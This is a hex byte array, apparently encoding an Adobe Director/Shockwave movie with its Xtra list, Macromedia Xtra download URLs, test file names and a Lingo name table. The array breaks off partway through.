0x65, 0x74, 0x46, 0x69, 0x6C, 0x65, 0x20, 0x50, 0x50, 0x43, 0x20, 0x58, 0x74, 0x72, 0x61, 0x00, 0x06, 0x05, 0x0B, 0x4E, 0x45, 0x54, 0x46, 0x49, 0x4C, 0x45, 0x2E, 0x58, 0x33, 0x32, 0x00, 0x00, 0x00, 0x00, 0x4B, 0x00, 0x00, 0x00, 0x18, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x15, 0x00, 0x00, 0x00, 0x25, 0x06, 0x02, 0x11, 0x4E, 0x65, 0x74, 0x4C, 0x69, 0x6E, 0x67, 0x6F, 0x20, 0x50, 0x50, 0x43, 0x20, 0x58, 0x74, 0x72, 0x61, 0x00, 0x06, 0x05, 0x0C, 0x4E, 0x65, 0x74, 0x6C, 0x69, 0x6E, 0x67, 0x6F, 0x2E, 0x78, 0x33, 0x32, 0x00, 0x00, 0x00, 0x00, 0xCC, 0x00, 0x00, 0x00, 0x18, 0x01, 0x01, 0x01, 0x12, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x1E, 0x00, 0x00, 0x00, 0x2E, 0x00, 0x00, 0x00, 0x6C, 0x00, 0x00, 0x00, 0x8A, 0x00, 0x00, 0x00, 0x9A, 0x06, 0x02, 0x1A, 0x53, 0x57, 0x41, 0x20, 0x44, 0x65, 0x63, 0x6F, 0x6D, 0x70, 0x72, 0x65, 0x73, 0x73, 0x69, 0x6F, 0x6E, 0x20, 0x50, 0x50, 0x43, 0x20, 0x58, 0x74, 0x72, 0x61, 0x00, 0x06, 0x05, 0x0C, 0x73, 0x77, 0x61, 0x64, 0x63, 0x6D, 0x70, 0x72, 0x2E, 0x78, 0x33, 0x32, 0x00, 0x01, 0x00, 0x3A, 0x68, 0x74, 0x74, 0x70, 0x3A, 0x2F, 0x2F, 0x64, 0x6F, 0x77, 0x6E, 0x6C, 0x6F, 0x61, 0x64, 0x2E, 0x6D, 0x61, 0x63, 0x72, 0x6F, 0x6D, 0x65, 0x64, 0x69, 0x61, 0x2E, 0x63, 0x6F, 0x6D, 0x2F, 0x70, 0x75, 0x62, 0x2F, 0x73, 0x68, 0x6F, 0x63, 0x6B, 0x77, 0x61, 0x76, 0x65, 0x31, 0x31, 0x2E, 0x35, 0x2F, 0x78, 0x74, 0x72, 0x61, 0x73, 0x2F, 0x53, 0x57, 0x41, 0x00, 0x21, 0x02, 0x1A, 0x53, 0x57, 0x41, 0x20, 0x44, 0x65, 0x63, 0x6F, 0x6D, 0x70, 0x72, 0x65, 0x73, 0x73, 0x69, 0x6F, 0x6E, 0x20, 0x50, 0x50, 0x43, 0x20, 0x58, 0x74, 0x72, 0x61, 0x00, 0x41, 0x05, 0x0C, 0x73, 0x77, 0x61, 0x64, 0x63, 0x6D, 0x70, 0x72, 0x2E, 0x78, 0x33, 0x32, 0x00, 0x00, 0x00, 0x00, 0x96, 0x00, 0x00, 0x00, 0x18, 0x01, 0x00, 0x01, 0x12, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x13, 0x00, 0x00, 0x00, 0x59, 0x00, 0x00, 0x00, 0x6C, 0x06, 0x05, 0x0F, 0x44, 0x69, 0x72, 0x65, 0x63, 0x74, 0x53, 0x6F, 0x75, 0x6E, 0x64, 0x2E, 0x78, 0x33, 0x32, 0x00, 0x01, 0x00, 0x42, 0x68, 0x74, 0x74, 0x70, 0x3A, 0x2F, 0x2F, 0x64, 0x6F, 0x77, 0x6E, 0x6C, 0x6F, 0x61, 0x64, 0x2E, 0x6D, 0x61, 0x63, 0x72, 0x6F, 0x6D, 0x65, 0x64, 0x69, 0x61, 0x2E, 0x63, 0x6F, 0x6D, 0x2F, 0x70, 0x75, 0x62, 0x2F, 0x73, 0x68, 0x6F, 0x63, 0x6B, 0x77, 0x61, 0x76, 0x65, 0x31, 0x31, 0x2E, 0x35, 0x2F, 0x78, 0x74, 0x72, 0x61, 0x73, 0x2F, 0x44, 0x69, 0x72, 0x65, 0x63, 0x74, 0x53, 0x6F, 0x75, 0x6E, 0x64, 0x00, 0x41, 0x05, 0x0F, 0x44, 0x69, 0x72, 0x65, 0x63, 0x74, 0x53, 0x6F, 0x75, 0x6E, 0x64, 0x2E, 0x78, 0x33, 0x32, 0x00, 0x00, 0x00, 0x00, 0xC5, 0x00, 0x00, 0x00, 0x18, 0x01, 0x01, 0x01, 0x12, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x00, 0x00, 0x00, 0x26, 0x00, 0x00, 0x00, 0x6D, 0x00, 0x00, 0x00, 0x7E, 0x00, 0x00, 0x00, 0x93, 0x06, 0x02, 0x0D, 0x53, 0x6F, 0x75, 0x6E, 0x64, 0x20, 0x43, 0x6F, 0x6E, 0x74, 0x72, 0x6F, 0x6C, 0x00, 0x06, 0x05, 0x11, 0x53, 0x6F, 0x75, 0x6E, 0x64, 0x20, 0x43, 0x6F, 0x6E, 0x74, 0x72, 0x6F, 0x6C, 0x2E, 0x78, 0x33, 0x32, 0x00, 0x01, 0x00, 0x43, 0x68, 0x74, 0x74, 0x70, 0x3A, 0x2F, 0x2F, 0x64, 0x6F, 0x77, 0x6E, 0x6C, 0x6F, 0x61, 0x64, 0x2E, 0x6D, 0x61, 0x63, 0x72, 0x6F, 0x6D, 0x65, 0x64, 0x69, 0x61, 0x2E, 0x63, 0x6F, 0x6D, 0x2F, 0x70, 0x75, 0x62, 0x2F, 0x73, 0x68, 0x6F, 0x63, 0x6B, 0x77, 0x61, 0x76, 0x65, 0x31, 0x31, 0x2E, 0x35, 0x2F, 0x78, 0x74, 0x72, 0x61, 0x73, 0x2F, 0x53, 0x6F, 0x75, 0x6E, 0x64, 0x43, 0x6F, 0x6E, 0x74, 0x72, 0x6F, 0x6C, 0x00, 0x21, 0x02, 0x0D, 0x53, 0x6F, 0x75, 0x6E, 0x64, 0x20, 0x43, 0x6F, 0x6E, 0x74, 0x72, 0x6F, 0x6C, 0x00, 0x41, 0x05, 0x11, 0x53, 0x6F, 0x75, 0x6E, 0x64, 0x20, 0x43, 0x6F, 0x6E, 0x74, 0x72, 0x6F, 0x6C, 0x2E, 0x78, 0x33, 0x32, 0x00, 0x00, 0x00, 0x00, 0x91, 0x00, 0x00, 0x00, 0x18, 0x00, 0x01, 0x01, 0x12, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x57, 0x00, 0x00, 0x00, 0x67, 0x06, 0x02, 0x0C, 0x43, 0x6F, 0x72, 0x65, 0x41, 0x75, 0x64, 0x69, 0x6F, 0x4D, 0x69, 0x78, 0x00, 0x01, 0x00, 0x43, 0x68, 0x74, 0x74, 0x70, 0x3A, 0x2F, 0x2F, 0x64, 0x6F, 0x77, 0x6E, 0x6C, 0x6F, 0x61, 0x64, 0x2E, 0x6D, 0x61, 0x63, 0x72, 0x6F, 0x6D, 0x65, 0x64, 0x69, 0x61, 0x2E, 0x63, 0x6F, 0x6D, 0x2F, 0x70, 0x75, 0x62, 0x2F, 0x73, 0x68, 0x6F, 0x63, 0x6B, 0x77, 0x61, 0x76, 0x65, 0x31, 0x31, 0x2E, 0x35, 0x2F, 0x78, 0x74, 0x72, 0x61, 0x73, 0x2F, 0x43, 0x6F, 0x72, 0x65, 0x41, 0x75, 0x64, 0x69, 0x6F, 0x4D, 0x69, 0x78, 0x00, 0x21, 0x02, 0x0C, 0x43, 0x6F, 0x72, 0x65, 0x41, 0x75, 0x64, 0x69, 0x6F, 0x4D, 0x69, 0x78, 0x00, 0x00, 0x00, 0x00, 0xC6, 0x00, 0x00, 0x00, 0x18, 0x01, 0x01, 0x01, 0x12, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x00, 0x00, 0x00, 0x26, 0x00, 0x00, 0x00, 0x6E, 0x00, 0x00, 0x00, 0x7F, 0x00, 0x00, 0x00, 0x94, 0x06, 0x02, 0x0D, 0x42, 0x69, 0x74, 0x6D, 0x61, 0x70, 0x46, 0x69, 0x6C, 0x74, 0x65, 0x72, 0x73, 0x00, 0x06, 0x05, 0x11, 0x42, 0x69, 0x74, 0x6D, 0x61, 0x70, 0x46, 0x69, 0x6C, 0x74, 0x65, 0x72, 0x73, 0x2E, 0x78, 0x33, 0x32, 0x00, 0x01, 0x00, 0x44, 0x68, 0x74, 0x74, 0x70, 0x3A, 0x2F, 0x2F, 0x64, 0x6F, 0x77, 0x6E, 0x6C, 0x6F, 0x61, 0x64, 0x2E, 0x6D, 0x61, 0x63, 0x72, 0x6F, 0x6D, 0x65, 0x64, 0x69, 0x61, 0x2E, 0x63, 0x6F, 0x6D, 0x2F, 0x70, 0x75, 0x62, 0x2F, 0x73, 0x68, 0x6F, 0x63, 0x6B, 0x77, 0x61, 0x76, 0x65, 0x31, 0x31, 0x2E, 0x35, 0x2F, 0x78, 0x74, 0x72, 0x61, 0x73, 0x2F, 0x42, 0x69, 0x74, 0x6D, 0x61, 0x70, 0x46, 0x69, 0x6C, 0x74, 0x65, 0x72, 0x73, 0x00, 0x21, 0x02, 0x0D, 0x42, 0x69, 0x74, 0x6D, 0x61, 0x70, 0x46, 0x69, 0x6C, 0x74, 0x65, 0x72, 0x73, 0x00, 0x41, 0x05, 0x11, 0x42, 0x69, 0x74, 0x6D, 0x61, 0x70, 0x46, 0x69, 0x6C, 0x74, 0x65, 0x72, 0x73, 0x2E, 0x78, 0x33, 0x32, 0x00, 0x00, 0x4C, 0x73, 0x43, 0x4D, 0x3A, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0C, 0x00, 0x00, 0x00, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0A, 0x00, 0x00, 0x00, 0x0A, 0x00, 0x00, 0x00, 0x0C, 0x00, 0x00, 0x00, 0x14, 0x08, 0x49, 0x6E, 0x74, 0x65, 0x72, 0x6E, 0x61, 0x6C, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 0x01, 0x04, 0x00, 0x53, 0x52, 0x45, 0x56, 0x0C, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x01, 0x00, 0x0B, 0x00, 0x05, 0x00, 0x00, 0x02, 0x51, 0x4C, 0x4F, 0x43, 0x46, 0x38, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x11, 0x11, 0x11, 0x22, 0x22, 0x22, 0x33, 0x33, 0x33, 0x44, 0x44, 0x44, 0x55, 0x55, 0x55, 0x66, 0x66, 0x66, 0x77, 0x77, 0x77, 0x88, 0x88, 0x88, 0x99, 0x99, 0x99, 0xAA, 0xAA, 0xAA, 0xBB, 0xBB, 0xBB, 0xCC, 0xCC, 0xCC, 0xDD, 0xDD, 0xDD, 0xEE, 0xEE, 0xEE, 0xFF, 0xFF, 0xFF, 0x4C, 0x42, 0x55, 0x50, 0x99, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0D, 0x00, 0x00, 0x00, 0x02, 0x9C, 0x00, 0x00, 0x02, 0x76, 0xFF, 0xFF, 0xFF, 0x0C, 0x00, 0x00, 0x00, 0x44, 0x00, 0x00, 0x00, 0x65, 0x00, 0x00, 0x00, 0x66, 0x00, 0x00, 0x00, 0x61, 0x00, 0x00, 0x00, 0x75, 0x00, 0x00, 0x00, 0x6C, 0x00, 0x00, 0x00, 0x74, 0x00, 0x00, 0x00, 0x2E, 0x00, 0x00, 0x00, 0x68, 0x00, 0x00, 0x00, 0x74, 0x00, 0x00, 0x00, 0x6D, 0x00, 0x00, 0x00, 0x6C, 0x08, 0x00, 0x00, 0x00, 0x54, 0x00, 0x00, 0x00, 0x45, 0x00, 0x00, 0x00, 0x53, 0x00, 0x00, 0x00, 0x54, 0x00, 0x00, 0x00, 0x2E, 0x00, 0x00, 0x00, 0x68, 0x00, 0x00, 0x00, 0x74, 0x00, 0x00, 0x00, 0x6D, 0x08, 0x00, 0x00, 0x00, 0x54, 0x00, 0x00, 0x00, 0x45, 0x00, 0x00, 0x00, 0x53, 0x00, 0x00, 0x00, 0x54, 0x00, 0x00, 0x00, 0x2E, 0x00, 0x00, 0x00, 0x64, 0x00, 0x00, 0x00, 0x63, 0x00, 0x00, 0x00, 0x72, 0x08, 0x00, 0x00, 0x00, 0x54, 0x00, 0x00, 0x00, 0x45, 0x00, 0x00, 0x00, 0x53, 0x00, 0x00, 0x00, 0x54, 0x00, 0x00, 0x00, 0x2E, 0x00, 0x00, 0x00, 0x6A, 0x00, 0x00, 0x00, 0x70, 0x00, 0x00, 0x00, 0x67, 0x0A, 0x00, 0x00, 0x00, 0x54, 0x00, 0x00, 0x00, 0x45, 0x00, 0x00, 0x00, 0x53, 0x00, 0x00, 0x00, 0x54, 0x00, 0x00, 0x00, 0x2E, 0x00, 0x00, 0x00, 0x63, 0x00, 0x00, 0x00, 0x6C, 0x00, 0x00, 0x00, 0x61, 0x00, 0x00, 0x00, 0x73, 0x00, 0x00, 0x00, 0x73, 0x04, 0x00, 0x00, 0x00, 0x54, 0x00, 0x00, 0x00, 0x45, 0x00, 0x00, 0x00, 0x53, 0x00, 0x00, 0x00, 0x54, 0x00, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0xFF, 0x00, 0x00, 0x00, 0x01, 0x50, 0x01, 0x00, 0x00, 0x01, 0x01, 0x00, 0x01, 0x0D, 0x00, 0x00, 0x00, 0x73, 0x00, 0x00, 0x00, 0x77, 0x00, 0x00, 0x00, 0x43, 0x00, 0x00, 0x00, 0x6F, 0x00, 0x00, 0x00, 0x6E, 0x00, 0x00, 0x00, 0x74, 0x00, 0x00, 0x00, 0x65, 0x00, 0x00, 0x00, 0x78, 0x00, 0x00, 0x00, 0x74, 0x00, 0x00, 0x00, 0x4D, 0x00, 0x00, 0x00, 0x65, 0x00, 0x00, 0x00, 0x6E, 0x00, 0x00, 0x00, 0x75, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x54, 0x45, 0x53, 0x54, 0x2E, 0x65, 0x78, 0x65, 0x00, 0x00, 0x00, 0x08, 0x54, 0x45, 0x53, 0x54, 0x2E, 0x61, 0x70, 0x70, 0x00, 0x00, 0x00, 0x0C, 0x54, 0x45, 0x53, 0x54, 0x2E, 0x63, 0x6C, 0x61, 0x73, 0x73, 0x69, 0x63, 0x00, 0x00, 0x00, 0x08, 0x53, 0x74, 0x61, 0x6E, 0x64, 0x61, 0x72, 0x64, 0x01, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x38, 0x30, 0x30, 0x30, 0x00, 0x00, 0x00, 0x00, 0x01, 0x30, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x44, 0x49, 0x52, 0x47, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x40, 0x00, 0x40, 0x00, 0x02, 0x00, 0x23, 0x00, 0x00, 0x00, 0xE6, 0x4C, 0x46, 0x44, 0x4D, 0x06, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x3A, 0x7E, 0x46, 0x52, 0x43, 0x53, 0x18, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x18, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x46, 0x52, 0x43, 0x53, 0x18, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x18, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x66, 0x6E, 0x69, 0x43, 0x3C, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x12, 0x00, 0x00, 0x00, 0x1A, 0x00, 0x00, 0x00, 0x1C, 0x00, 0x00, 0x00, 0x1E, 0x00, 0x01, 0x00, 0x01, 0x00, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x04, 0x9F, 0x00, 0x00, 0x00, 0x00, 0x00, 0xBB, 0x05, 0x7A, 0x00, 0x00, 0x00, 0x00, 0x2A, 0x53, 0x41, 0x43, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x74, 0x53, 0x41, 0x43, 0x93, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x76, 0x00, 0x00, 0x00, 0x11, 0x00, 0x00, 0x00, 0x14, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x14, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x0C, 0x4A, 0xB4, 0x0B, 0xEF, 0x4A, 0xB4, 0x0B, 0xEF, 0x4E, 0x2F, 0x41, 0x00, 0x00, 0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x87, 0x00, 0xA4, 0x00, 0x01, 0xFF, 0x00, 0x01, 0x02, 0x05, 0x00, 0x58, 0x74, 0x63, 0x4C, 0x6C, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x60, 0x00, 0x0C, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0xFF, 0xFF, 0x00, 0x00, 0x00, 0x0A, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x00, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0xFF, 0xFF, 0x00, 0x00, 0xFF, 0xFF, 0x6D, 0x61, 0x6E, 0x4C, 0x81, 0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x03, 0x6D, 0x00, 0x00, 0x03, 0x6D, 0x00, 0x14, 0x00, 0x69, 0x06, 0x66, 0x6F, 0x72, 0x67, 0x65, 0x74, 0x06, 0x77, 0x69, 0x6E, 0x64, 0x6F, 0x77, 0x06, 0x72, 0x65, 0x74, 0x75, 0x72, 0x6E, 0x0D, 0x77, 0x69, 0x6E, 0x64, 0x6F, 0x77, 0x50, 0x72, 0x65, 0x73, 0x65, 0x6E, 0x74, 0x03, 0x6E, 0x65, 0x77, 0x08, 0x66, 0x69, 0x6C, 0x65, 0x4E, 0x61, 0x6D, 0x65, 0x05, 0x74, 0x69, 0x74, 0x6C, 0x65, 0x07, 0x76, 0x69, 0x73, 0x69, 0x62, 0x6C, 0x65, 0x09, 0x73, 0x70, 0x72, 0x69, 0x74, 0x65, 0x54, 0x61, 0x62, 0x07, 0x63, 0x6F, 0x6D, 0x6D, 0x65, 0x6E, 0x74, 0x06, 0x73, 0x79, 0x6D, 0x62, 0x6F, 0x6C, 0x06, 0x73, 0x70, 0x72, 0x69, 0x74, 0x65, 0x07, 0x70, 0x69, 0x63, 0x74, 0x75, 0x72, 0x65, 0x09, 0x68, 0x65, 0x6C, 0x70, 0x54, 0x6F, 0x70, 0x69, 0x63, 0x17, 0x70, 0x72, 0x6F, 0x70, 0x65, 0x72, 0x74, 0x79, 0x44, 0x65, 0x73, 0x63, 0x72, 0x69, 0x70, 0x74, 0x69, 0x6F, 0x6E, 0x4C, 0x69, 0x73, 0x74, 0x04, 0x6E, 0x61, 0x6D, 0x65, 0x06, 0x66, 0x6F, 0x72, 0x6D, 0x61, 0x74, 0x06, 0x73, 0x74, 0x72, 0x69, 0x6E, 0x67, 0x0A, 0x73, 0x74, 0x61, 0x72, 0x74, 0x46, 0x72, 0x61, 0x6D, 0x65, 0x07, 0x69, 0x6E, 0x74, 0x65, 0x67, 0x65, 0x72, 0x08, 0x65, 0x6E, 0x64, 0x46, 0x72, 0x61, 0x6D, 0x65, 0x09, 0x73, 0x70, 0x72, 0x69, 0x74, 0x65, 0x4E, 0x75, 0x6D, 0x08, 0x65, 0x64, 0x69, 0x74, 0x61, 0x62, 0x6C, 0x65, 0x07, 0x62, 0x6F, 0x6F, 0x6C, 0x65, 0x61, 0x6E, 0x06, 0x6D, 0x65, 0x6D, 0x62, 0x65, 0x72, 0x05, 0x72, 0x61, 0x6E, 0x67, 0x65, 0x09, 0x66, 0x6F, 0x72, 0x65, 0x43, 0x6F, 0x6C, 0x6F, 0x72, 0x05, 0x63, 0x6F, 0x6C, 0x6F, 0x72, 0x09, 0x62, 0x61, 0x63, 0x6B, 0x43, 0x6F, 0x6C, 0x6F, 0x72, 0x05, 0x62, 0x6C, 0x65, 0x6E, 0x64, 0x03, 0x6D, 0x69, 0x6E, 0x03, 0x6D, 0x61, 0x78, 0x03, 0x69, 0x6E, 0x6B, 0x04, 0x6C, 0x6F, 0x63, 0x48, 0x04, 0x6C, 0x6F, 0x63, 0x56, 0x05, 0x77, 0x69, 0x64, 0x74, 0x68, 0x06, 0x68, 0x65, 0x69, 0x67, 0x68, 0x74, 0x08, 0x72, 0x6F, 0x74, 0x61, 0x74, 0x69, 0x6F, 0x6E, 0x05, 0x66, 0x6C, 0x6F, 0x61, 0x74, 0x04, 0x73, 0x6B, 0x65, 0x77, 0x05, 0x66, 0x6C, 0x69, 0x70, 0x48, 0x05, 0x66, 0x6C, 0x69, 0x70, 0x56, 0x06, 0x66, 0x69, 0x6C, 0x74, 0x65, 0x72, 0x13, 0x69, 0x74, 0x65, 0x6D, 0x44, 0x65, 0x73, 0x63, 0x72, 0x69, 0x70, 0x74, 0x69, 0x6F, 0x6E, 0x4C, 0x69, 0x73, 0x74, 0x04, 0x6E, 0x6F, 0x74, 0x65, 0x04, 0x74, 0x79, 0x70, 0x65, 0x05, 0x6C, 0x61, 0x62, 0x65, 0x6C, 0x04, 0x74, 0x65, 0x78, 0x74, 0x04, 0x6C, 0x65, 0x66, 0x74, 0x03, 0x74, 0x6F, 0x70, 0x05, 0x72, 0x69, 0x67, 0x68, 0x74, 0x06, 0x62, 0x6F, 0x74, 0x74, 0x6F, 0x6D, 0x09, 0x6D, 0x65, 0x6D, 0x62, 0x65, 0x72, 0x54, 0x61, 0x62, 0x06, 0x6E, 0x75, 0x6D, 0x62, 0x65, 0x72, 0x0A, 0x63, 0x61, 0x73, 0x74, 0x4C, 0x69, 0x62, 0x4E, 0x75, 0x6D, 0x0A, 0x73, 0x63, 0x72, 0x69, 0x70, 0x74, 0x54, 0x65, 0x78, 0x74, 0x07, 0x67, 0x65, 0x74, 0x50, 0x72, 0x6F, 0x70, 0x0C, 0x63, 0x72, 0x65, 0x61, 0x74, 0x69, 0x6F, 0x6E, 0x44, 0x61, 0x74, 0x65, 0x04, 0x64, 0x61, 0x74, 0x65, 0x0C, 0x6D, 0x6F, 0x64, 0x69, 0x66, 0x69, 0x65, 0x64, 0x44, 0x61, 0x74, 0x65, 0x0A, 0x6D, 0x6F, 0x64, 0x69, 0x66, 0x69, 0x65, 0x64, 0x42, 0x79, 0x08, 0x63, 0x6F, 0x6D, 0x6D, 0x65, 0x6E, 0x74, 0x73, 0x0D, 0x70, 0x75, 0x72, 0x67, 0x65, 0x50, 0x72, 0x69, 0x6F, 0x72, 0x69, 0x74, 0x79, 0x08, 0x6D, 0x6F, 0x64, 0x69, 0x66, 0x69, 0x65, 0x64, 0x06, 0x6C, 0x69, 0x6E, 0x6B, 0x65, 0x64, 0x06, 0x6C, 0x6F, 0x61, 0x64, 0x65, 0x64, 0x05, 0x6D, 0x65, 0x64, 0x69, 0x61, 0x09, 0x74, 0x68, 0x75, 0x6D, 0x62, 0x6E, 0x61, 0x69, 0x6C, 0x04, 0x73, 0x69, 0x7A, 0x65, 0x0A, 0x6D, 0x65, 0x6D, 0x6F, 0x72, 0x79, 0x73, 0x69, 0x7A, 0x65, 0x0A, 0x6D, 0x65, 0x64, 0x69, 0x61, 0x52, 0x65, 0x61, 0x64, 0x79, 0x0C, 0x67, 0x72, 0x61, 0x70, 0x68, 0x69, 0x63, 0x50, 0x72, 0x6F, 0x70, 0x73, 0x06, 0x68, 0x69, 0x6C, 0x69, 0x74, 0x65, 0x08, 0x72, 0x65, 0x67, 0x50, 0x6F, 0x69, 0x6E, 0x74, 0x05, 0x70, 0x6F, 0x69, 0x6E, 0x74, 0x04, 0x72, 0x65, 0x63, 0x74, 0x05, 0x61, 0x62, 0x6F, 0x75, 0x74, 0x06, 0x62, 0x75, 0x74, 0x74, 0x6F, 0x6E, 0x0A, 0x65, 0x64, 0x69, 0x74, 0x53, 0x63, 0x72, 0x69, 0x70, 0x74, 0x04, 0x65, 0x64, 0x69, 0x74, 0x09, 0x6E, 0x61, 0x6D, 0x65, 0x4C, 0x61, 0x62, 0x65, 0x6C, 0x09, 0x61, 0x6C, 0x69, 0x67, 0x6E, 0x6D, 0x65, 0x6E, 0x74, 0x08, 0x70, 0x72, 0x6F, 0x70, 0x65, 0x72, 0x74, 0x79, 0x09, 0x73, 0x69, 0x7A, 0x65, 0x4C, 0x61, 0x62, 0x65, 0x6C, 0x06, 0x62, 0x72, 0x6F, 0x77, 0x73, 0x65, 0x07, 0x6F, 0x70, 0x74, 0x69, 0x6F, 0x6E, 0x73, 0x0A, 0x70, 0x75, 0x72, 0x67, 0x65, 0x4C, 0x61, 0x62, 0x65, 0x6C, 0x0C, 0x63, 0x72, 0x65, 0x61, 0x74, 0x65, 0x64, 0x4C, 0x61, 0x62, 0x65, 0x6C, 0x07, 0x63, 0x72, 0x65, 0x61, 0x74, 0x65, 0x64, 0x0D, 0x6D, 0x6F, 0x64, 0x69, 0x66, 0x69, 0x65, 0x64, 0x4C, 0x61, 0x62, 0x65, 0x6C, 0x0F, 0x6D, 0x6F, 0x64, 0x69, 0x66, 0x69, 0x65, 0x64, 0x42, 0x79, 0x4C, 0x61, 0x62, 0x65, 0x6C, 0x0D, 0x63, 0x6F, 0x6D, 0x6D, 0x65, 0x6E, 0x74, 0x73, 0x4C, 0x61, 0x62, 0x65, 0x6C, 0x05, 0x66, 0x69, 0x65, 0x6C, 0x64, 0x06, 0x73, 0x63, 0x72, 0x6F, 0x6C, 0x6C, 0x08, 0x73, 0x68, 0x61, 0x70, 0x65, 0x54, 0x61, 0x62, 0x05, 0x73, 0x68, 0x61, 0x70, 0x65, 0x06, 0x66, 0x69, 0x6C, 0x6C, 0x65, 0x64, 0x09, 0x73, 0x68, 0x61, 0x70, 